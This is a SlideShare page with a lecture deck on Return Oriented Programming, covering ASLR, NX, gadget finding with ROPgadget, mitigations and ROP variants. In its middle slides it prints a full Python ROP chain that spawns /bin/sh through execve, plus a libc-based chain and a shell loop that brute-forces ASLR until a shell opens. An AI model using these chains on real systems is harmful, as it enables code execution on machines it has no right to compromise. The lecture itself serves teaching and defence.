SlideShare a Scribd company logo

Return Oriented Programming - ROP

Mihir Shah
Mihir Shah

This Presentation goes through many techniques regarding the mitigation and ways to exploit the stack using Return Oriented Programming

Technology
1 of 36
Download to read offline
An introduction to the Return Oriented Programming and ROP chain generation Why and How Keywords: ROP Intel / ARM, Tools, ROP chain generation, gadgets' semantics, ASLR and NX internal, JOP, SOP, BROP, SROP, example with CVE-2011-1938
Road-map ● Classical attacks without any security – Stack overflow exploitation in 2009 ● Mitigation against these classical attacks – Address space layout randomization – Not eXecute Bit ● ROP introduction – What is the ROP? – Why use the ROP? – How can we find gadgets? – Tools which can help you ● Real example – CVE-2011-1938 exploitation ● Mitigation against ROP attacks ● ROP variants – JOP, SOP, BROP, SROP ● Some cool research subjects – The gadgets semantics – Rop chain generation ● Conclusion ● References
Classical attacks without any security ● Find the bug ● Try to control the program counter register ● Store your shellcode somewhere in memory ● Set the program counter register to point on your shellcode – Shellcode executed → you win
Classical attacks without any security ● Classical stack buffer overflow – Control the saved EIP – Overwrite the SEIP with an address pointing to your code
Mitigation against these classical attacks ● Address Space Layout Randomization ● No eXecute bit ● There are other protections but we won't describe them in this lecture – ASCII Armor – FORTIFY_SOURCE – SSP
Address Space Layout Randomization ● Map your Heap and Stack randomly – At each execution, your Heap and Stack will be mapped at different places – It's the same for shared libraries and VDSO ● So, now you cannot jump on an hardened address like in a classical attacks (slide 4)
Address Space Layout Randomization - Example ● Two executions of the same binary : 009c0000-009e1000 rw-p 00000000 00:00 0 [heap] 7fff329f5000-7fff32a16000 rw-p 00000000 00:00 0 [stack] 7fff32bde000-7fff32bdf000 r-xp 00000000 00:00 0 [vdso] 01416000-01437000 rw-p 00000000 00:00 0 [heap] 7fff2fa70000-7fff2fa91000 rw-p 00000000 00:00 0 [stack] 7fff2fb1c000-7fff2fb1d000 r-xp 00000000 00:00 0 [vdso]
Address Space Layout Randomization – Linux Internal ● Heap and Stack areas mapped at a pseudo- random place for each execution
No eXecute bit ● NX bit is a CPU feature – On Intel CPU, it works only on x86_64 or with Physical Address Extension (PAE) enable ● Enabled, it raises an exception if the CPU tries to execute something that doesn't have the NX bit set ● The NX bit is located and setup in the Page Table Entry
No eXecute bit – Paging Internals
No eXecute bit – PTE Internal ● The last bit is the NX bit (exb) – 0 = disabled – 1 = enabled
ROP Introduction ● When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC Buchanan, E.; Roemer, R.; Shacham, H.; Savage, S. (October 2008) ● Return-Oriented Programming: Exploits Without Code Injection - Shacham, Hovav; Buchanan, Erik; Roemer, Ryan; Savage, Stefan. Retrieved 2009-08-12.
ROP definition ● Chain gadgets to execute malicious code. ● A gadget is a suite of instructions which end by the branch instruction ret (Intel) or the equivalent on ARM. – Intel examples: ● pop eax ; ret ● xor ebx, ebx ; ret ● Objective: Use gadgets instead of classical shellcode – ARM examples: ● pop {r4, pc} ● str r1, [r0] ; bx lr
A gadget can contain other gadgets ● Because x86 instructions aren't aligned, a gadget can contain another gadget. ● Doesn't work on RISC architectures like ARM, MIPS, SPARC... f7c7070000000f9545c3 → test edi, 0x7 ; setnz byte ptr [rbp-0x3d] ; c7070000000f9545c3 → mov dword ptr [rdi], 0xf000000 ; xchg ebp, eax ; ret
Why use the ROP? ● Gadgets are mainly located on segments without ASLR and on pages marked as executables – It can bypass the ASLR – It can bypass the NX bit -
Road-map attack ● Find your gadgets ● Store your gadgets addresses on the stack – You must to overwrite the saved eip with the address of your first gadget
CALL and RET semantics (Intel x86) ● CALL semantic ESP ← ESP – 4 [ESP] ← NEXT(EIP) ; sEIP EIP ← OPERANDE ● RET semantic TMP ← [ESP] ; get the sEIP ESP ← ESP + 4 ; Align stack pointer EIP ← TMP ; restore the sEIP
Attack process on x86 ● Gadget1 is executed and returns ● Gadget2 is executed and returns ● Gadget3 is executed and returns ● And so on until all instructions that you want are executed ● So, the real execution is: pop eax xor edx, edx inc ecx
Attack process on ARM ● This is exactly the same process but this time using this kind of gadgets: pop {r3, pc} mov r0, r3 ; pop {r4, r5, r6, pc} pop {r3, r4, r5, r6, r7, pc} ● On ARM it's possible to pop a value directly in the program counter register (pc)
How can we find gadgets? ● Several ways to find gadgets – Old school method : objdump and grep ● Some gadgets will be not found: Objdump aligns instructions. – Make your own tool which scans an executable segment – Use an existing tool
Tools which can help you ● Rp++ by Axel Souchet [3] ● Ropeme by Long Le Dinh [4] ● Ropc by patkt [5] ● Nrop by Aurelien wailly [6] ● ROPgadget by Jonathan Salwan [7]
ROPgadget tool ● ROPgadget is : – A gadgets finder and “auto-roper” – Written in Python – Using Capstone engine – Support PE, ELF, Mach-O formats – Support x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures
ROPgadget tool – Quick example ● Display available gadgets $ ./ROPgadget.py --binary ./test-suite-binaries/elf-Linux-x86-NDH-chall 0x08054487 : pop edi ; pop ebp ; ret 8 0x0806b178 : pop edi ; pop esi ; ret 0x08049fdb : pop edi ; ret [...] 0x0804e76b : xor eax, eax ; pop ebx ; ret 0x0806a14a : xor eax, eax ; pop edi ; ret 0x0804aae0 : xor eax, eax ; ret 0x080c8899 : xor ebx, edi ; call eax 0x080c85c6 : xor edi, ebx ; jmp dword ptr [edx] Unique gadgets found: 2447
ROPgadget tool – ROP chain generation in 5 steps ● Step 1 - Write-what-where gadgets – Write “/bin/sh” in memory ● Step 2 - Init syscall number gadgets – Setup execve syscall number ● Step 3 - Init syscall arguments gadgets – Setup execve arguments ● Step 4 - Syscall gadgets – Find syscall interrupt ● Step 5 - Build the ROP chain – Build the python payload int execve(const char *filename, char *const argv[], char *const envp[]); ● Objective :
Step 1 Write-what-where gadgets ● The edx register is the destination ● The eax register is the content ● xor eax, eax is used to put the null byte at the end - Step 1 -- Write-what-where gadgets [+] Gadget found: 0x80798dd mov dword ptr [edx], eax ; ret [+] Gadget found: 0x8052bba pop edx ; ret [+] Gadget found: 0x80a4be6 pop eax ; ret [+] Gadget found: 0x804aae0 xor eax, eax ; ret
Step 2 Init syscall number gadgets ● xor eax, eax is used to initialize the context to zero ● inc eax is used 11 times to setup the exceve syscall number - Step 2 -- Init syscall number gadgets [+] Gadget found: 0x804aae0 xor eax, eax ; ret [+] Gadget found: 0x8048ca6 inc eax ; ret
Step 3 Init syscall arguments gadgets ● int execve(const char *filename, char *const argv[], char *const envp[]); – pop ebx is used to initialize the first argument – pop ecx is used to initialize the second argument – pop edx is used to initialize the third argument - Step 3 -- Init syscall arguments gadgets [+] Gadget found: 0x8048144 pop ebx ; ret [+] Gadget found: 0x80c5dd2 pop ecx ; ret [+] Gadget found: 0x8052bba pop edx ; ret
Step 4 Syscall gadget ● int 0x80 is used to raise a syscall exception - Step 4 -- Syscall gadget [+] Gadget found: 0x8048ca8 int 0x80
Step 5 - Build the ROP chain p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a0) # @ .data p += pack('<I', 0x080a4be6) # pop eax ; ret p += '/bin' p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a4) # @ .data + 4 p += pack('<I', 0x080a4be6) # pop eax ; ret p += '//sh' p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x0804aae0) # xor eax, eax ; ret p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08048144) # pop ebx ; ret p += pack('<I', 0x080cd9a0) # @ .data p += pack('<I', 0x080c5dd2) # pop ecx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x0804aae0) # xor eax, eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca8) # int 0x80
Mitigation against the ROP attack ● Linux - Position-Independent Executable – Applies the ASLR on the section .text ● Can be bypassed on old specific 32bits-based Linux distribution – PIC (Position-Independent Code) is used for library when a binary is compiled with PIE ● On Windows, ASLR can include the section .text
ASLR – Entropy not enough on certain old distribution ● Tested on a ArchLinux 32 bits in 2011 – NX enable – ASLR enable – PIE enable – RELRO full ● If you don't have enough gadgets : – Choose yours in the libc – Brute-force the base address
PIC/PIE – Entropy not enough on certain old distribution base_addr = 0xb770a000 p = "a" * 44 # execve /bin/sh generated by RopGadget v3.3 p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret p += pack("<I", 0x42424242) # padding p += pack("<I", base_addr + 0x00178020) # @ .data p += pack("<I", 0x42424242) # padding p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret p += "/bin" [...] ● Brute-force the base address
PIC/PIE – Entropy not enough on certain old distribution [jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault [...] Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault sh-4.2$ ● Wait for a few seconds
ROP variants ● Jump Oriented Programming ● String Oriented Programmng ● Blind Return Oriented Programming ● Signal Return Oriented Programming
Conclusion ● The ROP is now a current operation and it's actively used by every attackers ● There is yet a lot of research around this attack like: – ROP mitigation (heuristic, etc...) – ROP chain generation – Smart gadgets finding – Etc...
References ● [1] http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html ● [2] http://cseweb.ucsd.edu/~hovav/dist/sparc.pdf ● [3] https://github.com/0vercl0k/rp ● [4] http://ropshell.com/ropeme/ ● [5] https://github.com/pakt/ropc ● [6] https://github.com/awailly/nrop ● [7] http://shell-storm.org/project/ROPgadget/ ● [8] https://www.comp.nus.edu.sg/~liangzk/papers/asiaccs11.pdf ● [9] https://www.lst.inf.ethz.ch/research/publications/PPREW_2013/PPREW_2013.pdf ● [10] http://www.scs.stanford.edu/brop/bittau-brop.pdf ● [11] https://labs.portcullis.co.uk/blog/ohm-2013-review-of-returning-signals-for-fun-and-profit/ ● [12] http://shell-storm.org/repo/Notepad/ROP-chain-generation-via-backtracking-and-state-machine.txt

Recommended

FOSDEM 2024 Neo in the Matrix
FOSDEM 2024 Neo in the MatrixFOSDEM 2024 Neo in the Matrix
FOSDEM 2024 Neo in the MatrixOlimex Bulgaria
 
Information security-management-system
Information security-management-systemInformation security-management-system
Information security-management-systemintellisenseit
 
AI & ML in Cyber Security - Why Algorithms are Dangerous
AI & ML in Cyber Security - Why Algorithms are DangerousAI & ML in Cyber Security - Why Algorithms are Dangerous
AI & ML in Cyber Security - Why Algorithms are DangerousRaffael Marty
 
Making Linux do Hard Real-time
Making Linux do Hard Real-timeMaking Linux do Hard Real-time
Making Linux do Hard Real-timeNational Cheng Kung University
 
LLM presentation final
LLM presentation finalLLM presentation final
LLM presentation finalRuth Griffin
 
Hardware-assisted Isolated Execution Environment to run trusted OS and applic...
Hardware-assisted Isolated Execution Environment to run trusted OS and applic...Hardware-assisted Isolated Execution Environment to run trusted OS and applic...
Hardware-assisted Isolated Execution Environment to run trusted OS and applic...Kuniyasu Suzaki
 
Chatbot Abstract
Chatbot AbstractChatbot Abstract
Chatbot AbstractAntaraBhattacharya12
 
ISMS implementation challenges-KASYS
ISMS implementation challenges-KASYSISMS implementation challenges-KASYS
ISMS implementation challenges-KASYSReza Teynia ISMS, ITSM, MSc
 

Recommended

FOSDEM 2024 Neo in the Matrix
FOSDEM 2024 Neo in the MatrixFOSDEM 2024 Neo in the Matrix
FOSDEM 2024 Neo in the MatrixOlimex Bulgaria
 
Information security-management-system
Information security-management-systemInformation security-management-system
Information security-management-systemintellisenseit
 
AI & ML in Cyber Security - Why Algorithms are Dangerous
AI & ML in Cyber Security - Why Algorithms are DangerousAI & ML in Cyber Security - Why Algorithms are Dangerous
AI & ML in Cyber Security - Why Algorithms are DangerousRaffael Marty
 
Making Linux do Hard Real-time
Making Linux do Hard Real-timeMaking Linux do Hard Real-time
Making Linux do Hard Real-timeNational Cheng Kung University
 
LLM presentation final
LLM presentation finalLLM presentation final
LLM presentation finalRuth Griffin
 
Hardware-assisted Isolated Execution Environment to run trusted OS and applic...
Hardware-assisted Isolated Execution Environment to run trusted OS and applic...Hardware-assisted Isolated Execution Environment to run trusted OS and applic...
Hardware-assisted Isolated Execution Environment to run trusted OS and applic...Kuniyasu Suzaki
 
Chatbot Abstract
Chatbot AbstractChatbot Abstract
Chatbot AbstractAntaraBhattacharya12
 
ISMS implementation challenges-KASYS
ISMS implementation challenges-KASYSISMS implementation challenges-KASYS
ISMS implementation challenges-KASYSReza Teynia ISMS, ITSM, MSc
 
Linux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisLinux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisPaul V. Novarese
 
Mm iso 27001 2013 +annex a
Mm iso 27001 2013 +annex aMm iso 27001 2013 +annex a
Mm iso 27001 2013 +annex aAndrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001
 
Information Security Governance and Strategy
Information Security Governance and Strategy Information Security Governance and Strategy
Information Security Governance and Strategy Dam Frank
 
Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析Bill Lin
 
Tecnicas monitoreo reportes con Asterisk
Tecnicas monitoreo reportes con AsteriskTecnicas monitoreo reportes con Asterisk
Tecnicas monitoreo reportes con AsteriskNicolás Gudiño
 
COBIT5 Introduction
COBIT5 IntroductionCOBIT5 Introduction
COBIT5 IntroductionMohammad Reda Katby
 
Cobit 5 - An Overview
Cobit 5 - An OverviewCobit 5 - An Overview
Cobit 5 - An OverviewAnurag Purohit
 
ARM and SoC Traning Part I -- Overview
ARM and SoC Traning Part I -- OverviewARM and SoC Traning Part I -- Overview
ARM and SoC Traning Part I -- OverviewNational Cheng Kung University
 
Linux PCI device driver
Linux PCI device driverLinux PCI device driver
Linux PCI device driver艾鍗科技
 
Rust vs C++
Rust vs C++Rust vs C++
Rust vs C++corehard_by
 
Use COBIT for IT SAVINGS
Use COBIT for IT SAVINGSUse COBIT for IT SAVINGS
Use COBIT for IT SAVINGSSanjiv Arora
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache ExploitationAngel Boy
 
What is Robotic Process Automation-RPA
What is Robotic Process Automation-RPAWhat is Robotic Process Automation-RPA
What is Robotic Process Automation-RPAComidor
 
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Vaticle
 
Etude de cas audit cobit 4.1
Etude de cas audit cobit 4.1Etude de cas audit cobit 4.1
Etude de cas audit cobit 4.1saqrjareh
 
IPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesIPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesMartin Děcký
 
UiPath rpa developer best practices
UiPath rpa developer best practicesUiPath rpa developer best practices
UiPath rpa developer best practicesUiPath
 
Maitriser la ssi pour les systèmes industriels
Maitriser la ssi pour les systèmes industrielsMaitriser la ssi pour les systèmes industriels
Maitriser la ssi pour les systèmes industrielsBee_Ware
 
Code completion using OpenAI APIs.pptx
Code completion using OpenAI APIs.pptxCode completion using OpenAI APIs.pptx
Code completion using OpenAI APIs.pptxFaiz Zeya
 
Unit-1 OOAD Introduction.pptx
Unit-1 OOAD Introduction.pptxUnit-1 OOAD Introduction.pptx
Unit-1 OOAD Introduction.pptxRavindranath67
 
Course lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingCourse lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingJonathan Salwan
 
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...distortdistort
 

More Related Content

What's hot

Linux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisLinux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisPaul V. Novarese
 
Information Security Governance and Strategy
Information Security Governance and Strategy Information Security Governance and Strategy
Information Security Governance and Strategy Dam Frank
 
Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析Bill Lin
 
Tecnicas monitoreo reportes con Asterisk
Tecnicas monitoreo reportes con AsteriskTecnicas monitoreo reportes con Asterisk
Tecnicas monitoreo reportes con AsteriskNicolás Gudiño
 
Linux PCI device driver
Linux PCI device driverLinux PCI device driver
Linux PCI device driver艾鍗科技
 
Use COBIT for IT SAVINGS
Use COBIT for IT SAVINGSUse COBIT for IT SAVINGS
Use COBIT for IT SAVINGSSanjiv Arora
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache ExploitationAngel Boy
 
What is Robotic Process Automation-RPA
What is Robotic Process Automation-RPAWhat is Robotic Process Automation-RPA
What is Robotic Process Automation-RPAComidor
 
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Vaticle
 
Etude de cas audit cobit 4.1
Etude de cas audit cobit 4.1Etude de cas audit cobit 4.1
Etude de cas audit cobit 4.1saqrjareh
 
IPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesIPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesMartin Děcký
 
UiPath rpa developer best practices
UiPath rpa developer best practicesUiPath rpa developer best practices
UiPath rpa developer best practicesUiPath
 
Maitriser la ssi pour les systèmes industriels
Maitriser la ssi pour les systèmes industrielsMaitriser la ssi pour les systèmes industriels
Maitriser la ssi pour les systèmes industrielsBee_Ware
 
Code completion using OpenAI APIs.pptx
Code completion using OpenAI APIs.pptxCode completion using OpenAI APIs.pptx
Code completion using OpenAI APIs.pptxFaiz Zeya
 
Unit-1 OOAD Introduction.pptx
Unit-1 OOAD Introduction.pptxUnit-1 OOAD Introduction.pptx
Unit-1 OOAD Introduction.pptxRavindranath67
 

What's hot (20)

Linux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisLinux Crash Dump Capture and Analysis
Linux Crash Dump Capture and Analysis
 
Mm iso 27001 2013 +annex a
Mm iso 27001 2013 +annex aMm iso 27001 2013 +annex a
Mm iso 27001 2013 +annex a
 
Information Security Governance and Strategy
Information Security Governance and Strategy Information Security Governance and Strategy
Information Security Governance and Strategy
 
Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析
 
Tecnicas monitoreo reportes con Asterisk
Tecnicas monitoreo reportes con AsteriskTecnicas monitoreo reportes con Asterisk
Tecnicas monitoreo reportes con Asterisk
 
COBIT5 Introduction
COBIT5 IntroductionCOBIT5 Introduction
COBIT5 Introduction
 
Cobit 5 - An Overview
Cobit 5 - An OverviewCobit 5 - An Overview
Cobit 5 - An Overview
 
ARM and SoC Traning Part I -- Overview
ARM and SoC Traning Part I -- OverviewARM and SoC Traning Part I -- Overview
ARM and SoC Traning Part I -- Overview
 
Linux PCI device driver
Linux PCI device driverLinux PCI device driver
Linux PCI device driver
 
Rust vs C++
Rust vs C++Rust vs C++
Rust vs C++
 
Use COBIT for IT SAVINGS
Use COBIT for IT SAVINGSUse COBIT for IT SAVINGS
Use COBIT for IT SAVINGS
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache Exploitation
 
What is Robotic Process Automation-RPA
What is Robotic Process Automation-RPAWhat is Robotic Process Automation-RPA
What is Robotic Process Automation-RPA
 
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
 
Etude de cas audit cobit 4.1
Etude de cas audit cobit 4.1Etude de cas audit cobit 4.1
Etude de cas audit cobit 4.1
 
IPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesIPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, Capabilities
 
UiPath rpa developer best practices
UiPath rpa developer best practicesUiPath rpa developer best practices
UiPath rpa developer best practices
 
Maitriser la ssi pour les systèmes industriels
Maitriser la ssi pour les systèmes industrielsMaitriser la ssi pour les systèmes industriels
Maitriser la ssi pour les systèmes industriels
 
Code completion using OpenAI APIs.pptx
Code completion using OpenAI APIs.pptxCode completion using OpenAI APIs.pptx
Code completion using OpenAI APIs.pptx
 
Unit-1 OOAD Introduction.pptx
Unit-1 OOAD Introduction.pptxUnit-1 OOAD Introduction.pptx
Unit-1 OOAD Introduction.pptx
 

Similar to Return Oriented Programming - ROP

Course lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingCourse lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingJonathan Salwan
 
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...distortdistort
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_royRoy
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROPJapneet Singh
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughterQuinn Wilton
 
Devirtualizing FinSpy
Devirtualizing FinSpyDevirtualizing FinSpy
Devirtualizing FinSpyjduart
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyPriyanka Aash
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyPriyanka Aash
 
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...Positive Hack Days
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadachecamsec
 
04basic Concepts
04basic Concepts04basic Concepts
04basic ConceptsZhiwen Guo
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick reviewCe.Se.N.A. Security
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationKernel TLV
 
Everybody be cool, this is a ROPpery
Everybody be cool, this is a ROPperyEverybody be cool, this is a ROPpery
Everybody be cool, this is a ROPperyVincenzo Iozzo
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDBJian-Yu Li
 

Similar to Return Oriented Programming - ROP (20)

Course lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingCourse lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented Programming
 
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROP
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Devirtualizing FinSpy
Devirtualizing FinSpyDevirtualizing FinSpy
Devirtualizing FinSpy
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
04basic Concepts
04basic Concepts04basic Concepts
04basic Concepts
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
fg.workshop: Software vulnerability
fg.workshop: Software vulnerabilityfg.workshop: Software vulnerability
fg.workshop: Software vulnerability
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
 
Everybody be cool, this is a ROPpery
Everybody be cool, this is a ROPperyEverybody be cool, this is a ROPpery
Everybody be cool, this is a ROPpery
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDB
 

More from Mihir Shah

Windows custom shellcoding
Windows custom shellcodingWindows custom shellcoding
Windows custom shellcodingMihir Shah
 
Seh based attack
Seh based attackSeh based attack
Seh based attackMihir Shah
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershellMihir Shah
 
Securing docker containers
Securing docker containersSecuring docker containers
Securing docker containersMihir Shah
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflowMihir Shah
 
Cracking the crypto
Cracking the cryptoCracking the crypto
Cracking the cryptoMihir Shah
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentestingMihir Shah
 
Reversing with gdb
Reversing with gdbReversing with gdb
Reversing with gdbMihir Shah
 
PMKID ATTACK!!
PMKID ATTACK!!PMKID ATTACK!!
PMKID ATTACK!!Mihir Shah
 

More from Mihir Shah (13)

Windows custom shellcoding
Windows custom shellcodingWindows custom shellcoding
Windows custom shellcoding
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
 
Kubernetes
KubernetesKubernetes
Kubernetes
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
 
Securing docker containers
Securing docker containersSecuring docker containers
Securing docker containers
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Cracking the crypto
Cracking the cryptoCracking the crypto
Cracking the crypto
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
 
Reversing with gdb
Reversing with gdbReversing with gdb
Reversing with gdb
 
ROP
ROPROP
ROP
 
PMKID ATTACK!!
PMKID ATTACK!!PMKID ATTACK!!
PMKID ATTACK!!
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
 

Recently uploaded

Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
